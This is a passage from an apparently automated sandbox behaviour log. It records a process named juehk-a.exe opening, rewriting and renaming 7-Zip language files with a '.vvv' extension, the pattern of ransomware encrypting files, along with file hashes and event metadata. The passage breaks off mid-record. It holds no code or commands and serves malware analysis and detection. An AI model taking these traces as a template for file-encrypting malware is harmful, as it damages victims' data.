11099.          CreateOptions: 0x0
11100.        file:
11101.          timestamp: 62643
11102.          mode: rename
11103.          sequenceNumber: 809
11104.          filesize: 11006
11105.          md5sum: 73be24c416880294b4d59099bf2435ff
11106.          sha1sum: d4bda2a8e9cfebf225447264327920c356dbd428
11107.          processinfo:
11108.            pid: 1648
11109.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11110.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11111.          old_name: C:\Program Files\7-Zip\Lang\gl.txt
11112.          new_name: C:\Program Files\7-Zip\Lang\gl.txt.vvv
11113.            ads:
11114.          fid (ads:): 562949953519741
11115.          ntstatus: 0x0
11116.          CreateOptions: 0x0
11117.        file:
11118.          timestamp: 62706
11119.          mode: open
11120.          sequenceNumber: 810
11121.          value: C:\Program Files\7-Zip\Lang\gu.txt
11122.          filesize: 26704
11123.          processinfo:
11124.            pid: 1648
11125.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11126.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11127.            ads:
11128.          fid (ads:): 562949953519742
11129.          ntstatus: 0x0
11130.          CreateOptions: 0x60
11131.        file:
11132.          timestamp: 62955
11133.          mode: close
11134.          sequenceNumber: 811
11135.          value: C:\Program Files\7-Zip\Lang\gu.txt
11136.          filesize: 27134
11137.          md5sum: 1ad7f1d20448f00c50934a4425c8b043
11138.          sha1sum: b7895931ddd16eff502f217020154b2cde80f071
11139.          processinfo:
11140.            pid: 1648
11141.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11142.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11143.            ads:
11144.          fid (ads:): 562949953519742
11145.          ntstatus: 0x0
11146.          CreateOptions: 0x0
11147.        file:
11148.          timestamp: 62960
11149.          mode: rename
11150.          sequenceNumber: 812
11151.          filesize: 27134
11152.          md5sum: 1ad7f1d20448f00c50934a4425c8b043
11153.          sha1sum: b7895931ddd16eff502f217020154b2cde80f071
11154.          processinfo:
11155.            pid: 1648
11156.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11157.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11158.          old_name: C:\Program Files\7-Zip\Lang\gu.txt
11159.          new_name: C:\Program Files\7-Zip\Lang\gu.txt.vvv
11160.            ads:
11161.          fid (ads:): 562949953519742
11162.          ntstatus: 0x0
11163.          CreateOptions: 0x0
11164.        file:
11165.          timestamp: 62966
11166.          mode: open
11167.          sequenceNumber: 813
11168.          value: C:\Program Files\7-Zip\Lang\he.txt
11169.          filesize: 16419
11170.          processinfo:
11171.            pid: 1648
11172.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11173.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11174.            ads:
11175.          fid (ads:): 562949953519743
11176.          ntstatus: 0x0
11177.          CreateOptions: 0x60
11178.        file:
11179.          timestamp: 63182
11180.          mode: close
11181.          sequenceNumber: 814
11182.          value: C:\Program Files\7-Zip\Lang\he.txt
11183.          filesize: 16846
11184.          md5sum: 2627e549b5a90a43426990e19b5062ea
11185.          sha1sum: acdb0329383aa64338622c0e5ec7558526ce2445
11186.          processinfo:
11187.            pid: 1648
11188.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11189.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11190.            ads:
11191.          fid (ads:): 562949953519743
11192.          ntstatus: 0x0
11193.          CreateOptions: 0x0
11194.        file:
11195.          timestamp: 63196
11196.          mode: rename
11197.          sequenceNumber: 815
11198.          filesize: 16846
11199.          md5sum: 2627e549b5a90a43426990e19b5062ea
11200.          sha1sum: acdb0329383aa64338622c0e5ec7558526ce2445
11201.          processinfo:
11202.            pid: 1648
11203.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11204.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11205.          old_name: C:\Program Files\7-Zip\Lang\he.txt
11206.          new_name: C:\Program Files\7-Zip\Lang\he.txt.vvv
11207.            ads:
11208.          fid (ads:): 562949953519743
11209.          ntstatus: 0x0
11210.          CreateOptions: 0x0
11211.        file:
11212.          timestamp: 63224
11213.          mode: open
11214.          sequenceNumber: 816
11215.          value: C:\Program Files\7-Zip\Lang\hi.txt
11216.          filesize: 26795
11217.          processinfo:
11218.            pid: 1648
11219.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11220.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11221.            ads:
11222.          fid (ads:): 562949953519744
11223.          ntstatus: 0x0
11224.          CreateOptions: 0x60
11225.        file:
11226.          timestamp: 63834
11227.          mode: close
11228.          sequenceNumber: 817
11229.          value: C:\Program Files\7-Zip\Lang\hi.txt
11230.          filesize: 27214
11231.          md5sum: 7957a2643e018dadec6a3db7114ffdd1
11232.          sha1sum: 0f11e4deb3e56f4ed71fae67e58691324e3a287b
11233.          processinfo:
11234.            pid: 1648
11235.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11236.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11237.            ads:
11238.          fid (ads:): 562949953519744
11239.          ntstatus: 0x0
11240.          CreateOptions: 0x0
11241.        file:
11242.          timestamp: 63864
11243.          mode: rename
11244.          sequenceNumber: 818
11245.          filesize: 27214
11246.          md5sum: 7957a2643e018dadec6a3db7114ffdd1
11247.          sha1sum: 0f11e4deb3e56f4ed71fae67e58691324e3a287b
11248.          processinfo:
11249.            pid: 1648
11250.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11251.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11252.          old_name: C:\Program Files\7-Zip\Lang\hi.txt
11253.          new_name: C:\Program Files\7-Zip\Lang\hi.txt.vvv
11254.            ads:
11255.          fid (ads:): 562949953519744
11256.          ntstatus: 0x0
11257.          CreateOptions: 0x0
11258.        file:
11259.          timestamp: 63905
11260.          mode: open
11261.          sequenceNumber: 819
11262.          value: C:\Program Files\7-Zip\Lang\hr.txt
11263.          filesize: 13506
11264.          processinfo:
11265.            pid: 1648
11266.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11267.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11268.            ads:
11269.          fid (ads:): 562949953519745
11270.          ntstatus: 0x0
11271.          CreateOptions: 0x60
11272.        file:
11273.          timestamp: 64283
11274.          mode: close
11275.          sequenceNumber: 820
11276.          value: C:\Program Files\7-Zip\Lang\hr.txt
11277.          filesize: 13934
11278.          md5sum: 5846bf0b78dfced2e233693e1ef4f5e4
11279.          sha1sum: 61665af3a957fe6b4f7bd2e5037c0dd615ee108c
11280.          processinfo:
11281.            pid: 1648
11282.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11283.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11284.            ads:
11285.          fid (ads:): 562949953519745
11286.          ntstatus: 0x0
11287.          CreateOptions: 0x0
11288.        file:
11289.          timestamp: 64297
11290.          mode: rename
11291.          sequenceNumber: 821
11292.          filesize: 13934
11293.          md5sum: 5846bf0b78dfced2e233693e1ef4f5e4
11294.          sha1sum: 61665af3a957fe6b4f7bd2e5037c0dd615ee108c
11295.          processinfo:
11296.            pid: 1648
11297.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11298.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11299.          old_name: C:\Program Files\7-Zip\Lang\hr.txt
11300.          new_name: C:\Program Files\7-Zip\Lang\hr.txt.vvv
11301.            ads:
11302.          fid (ads:): 562949953519745
11303.          ntstatus: 0x0
11304.          CreateOptions: 0x0
11305.        file:
11306.          timestamp: 64310
11307.          mode: open
11308.          sequenceNumber: 822
11309.          value: C:\Program Files\7-Zip\Lang\hu.txt
11310.          filesize: 14584
11311.          processinfo:
11312.            pid: 1648
11313.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11314.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11315.            ads:
11316.          fid (ads:): 562949953519746
11317.          ntstatus: 0x0
11318.          CreateOptions: 0x60
11319.        file:
11320.          timestamp: 64378
11321.          mode: close
11322.          sequenceNumber: 823
11323.          value: C:\Program Files\7-Zip\Lang\hu.txt
11324.          filesize: 15006
11325.          md5sum: 5d65ae9d8df0d60d18a9f12618b4089a
11326.          sha1sum: 840ad256ba9293198bc2565dde4fcc82a0628962
11327.          processinfo:
11328.            pid: 1648
11329.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11330.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11331.            ads:
11332.          fid (ads:): 562949953519746
11333.          ntstatus: 0x0
11334.          CreateOptions: 0x0
11335.        file:
11336.          timestamp: 64387
11337.          mode: rename
11338.          sequenceNumber: 824
11339.          filesize: 15006
11340.          md5sum: 5d65ae9d8df0d60d18a9f12618b4089a
11341.          sha1sum: 840ad256ba9293198bc2565dde4fcc82a0628962
11342.          processinfo:
11343.            pid: 1648
11344.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11345.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11346.          old_name: C:\Program Files\7-Zip\Lang\hu.txt
11347.          new_name: C:\Program Files\7-Zip\Lang\hu.txt.vvv
11348.            ads:
11349.          fid (ads:): 562949953519746
11350.          ntstatus: 0x0
11351.          CreateOptions: 0x0
11352.        file:
11353.          timestamp: 64392
11354.          mode: open
11355.          sequenceNumber: 825
11356.          value: C:\Program Files\7-Zip\Lang\hy.txt
11357.          filesize: 18716
11358.          processinfo:
11359.            pid: 1648
11360.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11361.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11362.            ads:
11363.          fid (ads:): 562949953519747
11364.          ntstatus: 0x0
11365.          CreateOptions: 0x60
11366.        file:
11367.          timestamp: 64399
11368.          mode: close
11369.          sequenceNumber: 826
11370.          value: C:\Program Files\7-Zip\Lang\hy.txt
11371.          filesize: 19134
11372.          md5sum: 2b587579018173be4eb3336b222552a9
11373.          sha1sum: 39c744ffa110edfdc76a2bbc94f8c0311f20d922
11374.          processinfo:
11375.            pid: 1648
11376.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11377.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11378.            ads:
11379.          fid (ads:): 562949953519747
11380.          ntstatus: 0x0
11381.          CreateOptions: 0x0
11382.        file:
11383.          timestamp: 64407
11384.          mode: rename
11385.          sequenceNumber: 827
11386.          filesize: 19134
11387.          md5sum: 2b587579018173be4eb3336b222552a9
11388.          sha1sum: 39c744ffa110edfdc76a2bbc94f8c0311f20d922
11389.          processinfo:
11390.            pid: 1648
11391.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11392.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11393.          old_name: C:\Program Files\7-Zip\Lang\hy.txt
11394.          new_name: C:\Program Files\7-Zip\Lang\hy.txt.vvv
11395.            ads:
11396.          fid (ads:): 562949953519747
11397.          ntstatus: 0x0
11398.          CreateOptions: 0x0
11399.        file:
11400.          timestamp: 64412
11401.          mode: open
11402.          sequenceNumber: 828
11403.          value: C:\Program Files\7-Zip\Lang\id.txt
11404.          filesize: 13337
11405.          processinfo:
11406.            pid: 1648
11407.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11408.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11409.            ads:
11410.          fid (ads:): 562949953519748
11411.          ntstatus: 0x0
11412.          CreateOptions: 0x60
11413.        file:
11414.          timestamp: 64678
11415.          mode: close
11416.          sequenceNumber: 829
11417.          value: C:\Program Files\7-Zip\Lang\id.txt
11418.          filesize: 13758
11419.          md5sum: 3f6ed35d1c4454632ccdbef6759e1662
11420.          sha1sum: 518e74b9a9139f5c62dbd90ba218365ceac5ad5c
11421.          processinfo:
11422.            pid: 1648
11423.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11424.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11425.            ads:
11426.          fid (ads:): 562949953519748
11427.          ntstatus: 0x0
11428.          CreateOptions: 0x0
11429.        file:
11430.          timestamp: 64687
11431.          mode: rename
11432.          sequenceNumber: 830
11433.          filesize: 13758
11434.          md5sum: 3f6ed35d1c4454632ccdbef6759e1662
11435.          sha1sum: 518e74b9a9139f5c62dbd90ba218365ceac5ad5c
11436.          processinfo:
11437.            pid: 1648
11438.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11439.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11440.          old_name: C:\Program Files\7-Zip\Lang\id.txt
11441.          new_name: C:\Program Files\7-Zip\Lang\id.txt.vvv
11442.            ads:
11443.          fid (ads:): 562949953519748
11444.          ntstatus: 0x0
11445.          CreateOptions: 0x0
11446.        file:
11447.          timestamp: 64703
11448.          mode: open
11449.          sequenceNumber: 831
11450.          value: C:\Program Files\7-Zip\Lang\io.txt
11451.          filesize: 10115
11452.          processinfo:
11453.            pid: 1648
11454.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11455.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11456.            ads:
11457.          fid (ads:): 562949953519749
11458.          ntstatus: 0x0
11459.          CreateOptions: 0x60
11460.        file:
11461.          timestamp: 64877
11462.          mode: close
11463.          sequenceNumber: 832
11464.          value: C:\Program Files\7-Zip\Lang\io.txt
11465.          filesize: 10542
11466.          md5sum: ad10d1c79439a02d2048f5db59fd9358
11467.          sha1sum: 911c7bc1ee63de6168efbb75369b1fec1cea86aa
11468.          processinfo:
11469.            pid: 1648
11470.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11471.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11472.            ads:
11473.          fid (ads:): 562949953519749
11474.          ntstatus: 0x0
11475.          CreateOptions: 0x0
11476.        file:
11477.          timestamp: 64890
11478.          mode: rename
11479.          sequenceNumber: 833
11480.          filesize: 10542
11481.          md5sum: ad10d1c79439a02d2048f5db59fd9358
11482.          sha1sum: 911c7bc1ee63de6168efbb75369b1fec1cea86aa
11483.          processinfo:
11484.            pid: 1648
11485.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11486.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11487.          old_name: C:\Program Files\7-Zip\Lang\io.txt
11488.          new_name: C:\Program Files\7-Zip\Lang\io.txt.vvv
11489.            ads:
11490.          fid (ads:): 562949953519749
11491.          ntstatus: 0x0
11492.          CreateOptions: 0x0
11493.        file:
11494.          timestamp: 64976
11495.          mode: open
11496.          sequenceNumber: 834
11497.          value: C:\Program Files\7-Zip\Lang\is.txt
11498.          filesize: 12293
11499.          processinfo:
11500.            pid: 1648
11501.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11502.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11503.            ads:
11504.          fid (ads:): 562949953519750
11505.          ntstatus: 0x0
11506.          CreateOptions: 0x60
11507.        file:
11508.          timestamp: 65280
11509.          mode: close
11510.          sequenceNumber: 835
11511.          value: C:\Program Files\7-Zip\Lang\is.txt
11512.          filesize: 12718
11513.          md5sum: bf831e31a731fc607fc5daed22e251dc
11514.          sha1sum: 2d8499bb9c6b6d144dfa9c962a48f66c946b18e4
11515.          processinfo:
11516.            pid: 1648
11517.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11518.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11519.            ads:
11520.          fid (ads:): 562949953519750
11521.          ntstatus: 0x0
11522.          CreateOptions: 0x0
11523.        file:
11524.          timestamp: 65475
11525.          mode: rename
11526.          sequenceNumber: 836
11527.          filesize: 12718
11528.          md5sum: bf831e31a731fc607fc5daed22e251dc
11529.          sha1sum: 2d8499bb9c6b6d144dfa9c962a48f66c946b18e4
11530.          processinfo:
11531.            pid: 1648
11532.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11533.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11534.          old_name: C:\Program Files\7-Zip\Lang\is.txt
11535.          new_name: C:\Program Files\7-Zip\Lang\is.txt.vvv
11536.            ads:
11537.          fid (ads:): 562949953519750
11538.          ntstatus: 0x0
11539.          CreateOptions: 0x0
11540.        file:
11541.          timestamp: 65485
11542.          mode: open
11543.          sequenceNumber: 837
11544.          value: C:\Program Files\7-Zip\Lang\it.txt
11545.          filesize: 14153
11546.          processinfo:
11547.            pid: 1648
11548.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11550.            ads:
11551.          fid (ads:): 562949953519751
11552.          ntstatus: 0x0
11553.          CreateOptions: 0x60
11554.        file:
11555.          timestamp: 65564
11556.          mode: close
11557.          sequenceNumber: 838
11558.          value: C:\Program Files\7-Zip\Lang\it.txt
11559.          filesize: 14574
11560.          md5sum: 1973e783c402859516f1a916d623b5d4
11561.          sha1sum: 7487b8654f93965ee47dff9ed03935842c1dd8bb
11562.          processinfo:
11563.            pid: 1648
11564.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11565.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11566.            ads:
11567.          fid (ads:): 562949953519751
11568.          ntstatus: 0x0
11569.          CreateOptions: 0x0
11570.        file:
11571.          timestamp: 65572
11572.          mode: rename
11573.          sequenceNumber: 839
11574.          filesize: 14574
11575.          md5sum: 1973e783c402859516f1a916d623b5d4
11576.          sha1sum: 7487b8654f93965ee47dff9ed03935842c1dd8bb
11577.          processinfo:
11578.            pid: 1648
11579.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11580.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11581.          old_name: C:\Program Files\7-Zip\Lang\it.txt
11582.          new_name: C:\Program Files\7-Zip\Lang\it.txt.vvv
11583.            ads:
11584.          fid (ads:): 562949953519751
11585.          ntstatus: 0x0
11586.          CreateOptions: 0x0
11587.        file:
11588.          timestamp: 65580
11589.          mode: open
11590.          sequenceNumber: 840
11591.          value: C:\Program Files\7-Zip\Lang\ja.txt
11592.          filesize: 15953
11593.          processinfo:
11594.            pid: 1648
11595.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11596.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11597.            ads:
11598.          fid (ads:): 562949953519752
11599.          ntstatus: 0x0
11600.          CreateOptions: 0x60
11601.        file:
11602.          timestamp: 65604
11603.          mode: close
11604.          sequenceNumber: 841
11605.          value: C:\Program Files\7-Zip\Lang\ja.txt
11606.          filesize: 16382
11607.          md5sum: 4ec16c048c79b5c77a0c56cddbead869
11608.          sha1sum: d43e8b6a91e9214f7bcaaeb59c27cf71652dd779
11609.          processinfo:
11610.            pid: 1648
11611.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11612.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11613.            ads:
11614.          fid (ads:): 562949953519752
11615.          ntstatus: 0x0
11616.          CreateOptions: 0x0
11617.        file:
11618.          timestamp: 65611
11619.          mode: rename
11620.          sequenceNumber: 842
11621.          filesize: 16382
11622.          md5sum: 4ec16c048c79b5c77a0c56cddbead869
11623.          sha1sum: d43e8b6a91e9214f7bcaaeb59c27cf71652dd779
11624.          processinfo:
11625.            pid: 1648
11626.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11627.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11628.          old_name: C:\Program Files\7-Zip\Lang\ja.txt
11629.          new_name: C:\Program Files\7-Zip\Lang\ja.txt.vvv
11630.            ads:
11631.          fid (ads:): 562949953519752
11632.          ntstatus: 0x0
11633.          CreateOptions: 0x0
11634.        file:
11635.          timestamp: 65616
11636.          mode: open
11637.          sequenceNumber: 843
11638.          value: C:\Program Files\7-Zip\Lang\ka.txt
11639.          filesize: 19733
11640.          processinfo:
11641.            pid: 1648
11642.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11643.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11644.            ads:
11645.          fid (ads:): 562949953519753
11646.          ntstatus: 0x0
11647.          CreateOptions: 0x60
11648.        file:
11649.          timestamp: 65641
11650.          mode: close
11651.          sequenceNumber: 844
11652.          value: C:\Program Files\7-Zip\Lang\ka.txt
11653.          filesize: 20158
11654.          md5sum: a4c76ee2ce951bef9163649a15279663
11655.          sha1sum: 8073274858b411b97f4e34a32d97cf1ac1ba8613
11656.          processinfo:
11657.            pid: 1648
11658.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11659.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11660.            ads:
11661.          fid (ads:): 562949953519753
11662.          ntstatus: 0x0
11663.          CreateOptions: 0x0
11664.        file:
11665.          timestamp: 65674
11666.          mode: rename
11667.          sequenceNumber: 845
11668.          filesize: 20158
11669.          md5sum: a4c76ee2ce951bef9163649a15279663
11670.          sha1sum: 8073274858b411b97f4e34a32d97cf1ac1ba8613
11671.          processinfo:
11672.            pid: 1648
11673.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11674.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11675.          old_name: C:\Program Files\7-Zip\Lang\ka.txt
11676.          new_name: C:\Program Files\7-Zip\Lang\ka.txt.vvv
11677.            ads:
11678.          fid (ads:): 562949953519753
11679.          ntstatus: 0x0
11680.          CreateOptions: 0x0
11681.        file:
11682.          timestamp: 65680
11683.          mode: open
11684.          sequenceNumber: 846
11685.          value: C:\Program Files\7-Zip\Lang\kk.txt
11686.          filesize: 17704
11687.          processinfo:
11688.            pid: 1648
11689.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11690.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11691.            ads:
11692.          fid (ads:): 562949953519754
11693.          ntstatus: 0x0
11694.          CreateOptions: 0x60
11695.        file:
11696.          timestamp: 65739
11697.          mode: close
11698.          sequenceNumber: 847
11699.          value: C:\Program Files\7-Zip\Lang\kk.txt
11700.          filesize: 18126
11701.          md5sum: 84e010ab4a8b9814ec413ffcae486847
11702.          sha1sum: 08d1f46d7ca9bb2169ce37041fc0a325e228c48b
11703.          processinfo:
11704.            pid: 1648
11705.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11706.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11707.            ads:
11708.          fid (ads:): 562949953519754
11709.          ntstatus: 0x0
11710.          CreateOptions: 0x0
11711.        file:
11712.          timestamp: 65755
11713.          mode: rename
11714.          sequenceNumber: 848
11715.          filesize: 18126
11716.          md5sum: 84e010ab4a8b9814ec413ffcae486847
11717.          sha1sum: 08d1f46d7ca9bb2169ce37041fc0a325e228c48b
11718.          processinfo:
11719.            pid: 1648
11720.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11721.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11722.          old_name: C:\Program Files\7-Zip\Lang\kk.txt
11723.          new_name: C:\Program Files\7-Zip\Lang\kk.txt.vvv
11724.            ads:
11725.          fid (ads:): 562949953519754
11726.          ntstatus: 0x0
11727.          CreateOptions: 0x0
11728.        file:
11729.          timestamp: 65766
11730.          mode: open
11731.          sequenceNumber: 849
11732.          value: C:\Program Files\7-Zip\Lang\ko.txt
11733.          filesize: 14742
11734.          processinfo:
11735.            pid: 1648
11736.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11737.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11738.            ads:
11739.          fid (ads:): 562949953519755
11740.          ntstatus: 0x0
11741.          CreateOptions: 0x60
11742.        file:
11743.          timestamp: 65861
11744.          mode: close
11745.          sequenceNumber: 850
11746.          value: C:\Program Files\7-Zip\Lang\ko.txt
11747.          filesize: 15166
11748.          md5sum: d002f665bd7415ce917da6c8470bdf6a
11749.          sha1sum: 69dca8f49edf3911d1a898323bec262aa42023f4
11750.          processinfo:
11751.            pid: 1648
11752.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11753.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11754.            ads:
11755.          fid (ads:): 562949953519755
11756.          ntstatus: 0x0
11757.          CreateOptions: 0x0
11758.        file:
11759.          timestamp: 65870
11760.          mode: rename
11761.          sequenceNumber: 851
11762.          filesize: 15166
11763.          md5sum: d002f665bd7415ce917da6c8470bdf6a
11764.          sha1sum: 69dca8f49edf3911d1a898323bec262aa42023f4
11765.          processinfo:
11766.            pid: 1648
11767.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11768.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11769.          old_name: C:\Program Files\7-Zip\Lang\ko.txt
11770.          new_name: C:\Program Files\7-Zip\Lang\ko.txt.vvv
11771.            ads:
11772.          fid (ads:): 562949953519755
11773.          ntstatus: 0x0
11774.          CreateOptions: 0x0
11775.        file:
11776.          timestamp: 65877
11777.          mode: open
11778.          sequenceNumber: 852
11779.          value: C:\Program Files\7-Zip\Lang\ku-ckb.txt
11780.          filesize: 19711
11781.          processinfo:
11782.            pid: 1648
11783.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11784.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11785.            ads:
11786.          fid (ads:): 562949953519757
11787.          ntstatus: 0x0
11788.          CreateOptions: 0x60
11789.        file:
11790.          timestamp: 65961
11791.          mode: close
11792.          sequenceNumber: 853
11793.          value: C:\Program Files\7-Zip\Lang\ku-ckb.txt
11794.          filesize: 20126
11795.          md5sum: 2f6aa129b6e4a21161e6781c9b651564
11796.          sha1sum: 96154721c98797599e12629d5b0f733f03019883
11797.          processinfo:
11798.            pid: 1648
11799.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11800.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11801.            ads:
11802.          fid (ads:): 562949953519757
11803.          ntstatus: 0x0
11804.          CreateOptions: 0x0
11805.        file:
11806.          timestamp: 65968
11807.          mode: rename
11808.          sequenceNumber: 854
11809.          filesize: 20126
11810.          md5sum: 2f6aa129b6e4a21161e6781c9b651564
11811.          sha1sum: 96154721c98797599e12629d5b0f733f03019883
11812.          processinfo:
11813.            pid: 1648
11814.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11815.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11816.          old_name: C:\Program Files\7-Zip\Lang\ku-ckb.txt
11817.          new_name: C:\Program Files\7-Zip\Lang\ku-ckb.txt.vvv
11818.            ads:
11819.          fid (ads:): 562949953519757
11820.          ntstatus: 0x0
11821.          CreateOptions: 0x0
11822.        file:
11823.          timestamp: 65975
11824.          mode: open
11825.          sequenceNumber: 855
11826.          value: C:\Program Files\7-Zip\Lang\ku.txt
11827.          filesize: 11198
11828.          processinfo:
11829.            pid: 1648
11830.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11831.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11832.            ads:
11833.          fid (ads:): 562949953519756
11834.          ntstatus: 0x0
11835.          CreateOptions: 0x60
11836.        file:
11837.          timestamp: 66032
11838.          mode: close
11839.          sequenceNumber: 856
11840.          value: C:\Program Files\7-Zip\Lang\ku.txt
11841.          filesize: 11614
11842.          md5sum: 37203d855b8ae3c3a838b8b9d87b081e
11843.          sha1sum: 56e33a2c9713dcbd246e7d937ed13152f8152aff
11844.          processinfo:
11845.            pid: 1648
11846.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11847.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11848.            ads:
11849.          fid (ads:): 562949953519756
11850.          ntstatus: 0x0
11851.          CreateOptions: 0x0
11852.        file:
11853.          timestamp: 66075
11854.          mode: rename
11855.          sequenceNumber: 857
11856.          filesize: 11614
11857.          md5sum: 37203d855b8ae3c3a838b8b9d87b081e
11858.          sha1sum: 56e33a2c9713dcbd246e7d937ed13152f8152aff
11859.          processinfo:
11860.            pid: 1648
11861.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11862.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11863.          old_name: C:\Program Files\7-Zip\Lang\ku.txt
11864.          new_name: C:\Program Files\7-Zip\Lang\ku.txt.vvv
11865.            ads:
11866.          fid (ads:): 562949953519756
11867.          ntstatus: 0x0
11868.          CreateOptions: 0x0
11869.        file:
11870.          timestamp: 66084
11871.          mode: open
11872.          sequenceNumber: 858
11873.          value: C:\Program Files\7-Zip\Lang\lt.txt
11874.          filesize: 13239
11875.          processinfo:
11876.            pid: 1648
11877.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
11878.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
11879.            ads:
11880.          fid (ads:): 562949953519758
11881.          ntstatus: 0x0
11882.          CreateOptions: 0x60
11883.        file:
11884.          timestamp: 66307
11885.          mode: close
11886.          sequenceNumber: 859
11887.          value: C:\Program Files\7-Zip\Lang\lt.txt
11888.          filesize: 13662
11889.          md5sum: 3c96bfae5736bab33faea284c0e9d21c
11890.          sha1sum: 9fd4f816ed2e8034fee9dd2d7e2736df9031c98a
11891.          processinfo:
11892.            pid: 1648
